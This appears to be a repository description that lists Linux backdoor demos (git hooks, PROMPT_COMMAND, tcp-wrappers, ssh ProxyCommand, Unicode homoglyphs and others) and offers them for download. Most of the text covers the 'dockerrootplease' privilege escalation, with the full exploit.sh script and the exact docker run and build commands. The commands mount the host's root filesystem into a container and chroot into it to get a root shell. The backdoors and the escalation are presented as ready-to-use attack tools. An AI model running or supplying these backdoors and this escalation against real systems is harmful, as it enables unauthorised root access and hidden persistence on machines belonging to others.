Repository holding all alternatives of Unix/Linux backdoors.
List of Backdoor :
+ Demo git-hook backdoor
+ Demo Prompt-Command
+ Demo tcp-wrappers
+ Network-manager (wireless backdoor)
+ Demo Nmap
+ Demo ssh proxycommand
+ Demo Teensyduino; is a complete USB-Based microcontroler dev system in a very small footprint.
+ Demo Unicode Homoglyps
+ Demo Suddouer
+ Added dockerrootplease privilege escalation through Docker
Latest change and updates(19/06/2015): Added dockerrootplease privilege escalation through Docker.
The command you run to perform the privilege escalation fetches my Docker image from the Docker Hub Registry and runs it. The -v parameter that you pass to Docker specifies that you want to create a volume in the Docker instance. The -i and -t parameters put Docker into ‘shell mode’ rather than starting a daemon process.
The instance is set up to mount the root filesystem of the host machine to the instance’s volume, so when the instance starts it immediately loads a chroot into that volume. This effectively gives you root on the machine.
There are many, many other ways to achieve this, but this was one of the most straightforward. You can find the code in the Github repo and the actual image on Docker Hub.
exploit.sh Script:
# # # if [ ! -d "/hostOS" ]; then echo echo ==== ERROR ==== echo It looks like /hostOS does not exist echo Please run this docker image with a /hostOS volume mounted to / echo For example: docker run -v /:/hostOS -i -t exploitapp echo exit fi if [ ! -e "/hostOS/bin/sh" ]; then echo echo ==== ERROR ==== echo It looks like /hostOS does not contain a root filesystem echo Please run this docker image with a /hostOS volume mounted to / echo For example: docker run -v /:/hostOS -i -t exploitapp echo exit fi echo echo You should now have a root shell on the host OS echo Press Ctrl-D to exit the docker instance / shell chroot /hostOS /bin/sh
How to Use
Through Docker Hub:
> docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
Or through Github:
> git clone https://github.com/chrisfosterelli/dockerrootplease rootplease > cd rootplease/ > docker build -t rootplease . > docker run -v /:/hostOS -i -t rootplease
Download All Demos : Linux-native-backdoor.zip(1.7 MB) | Clone Url
Source : https://github.com/ulissescastro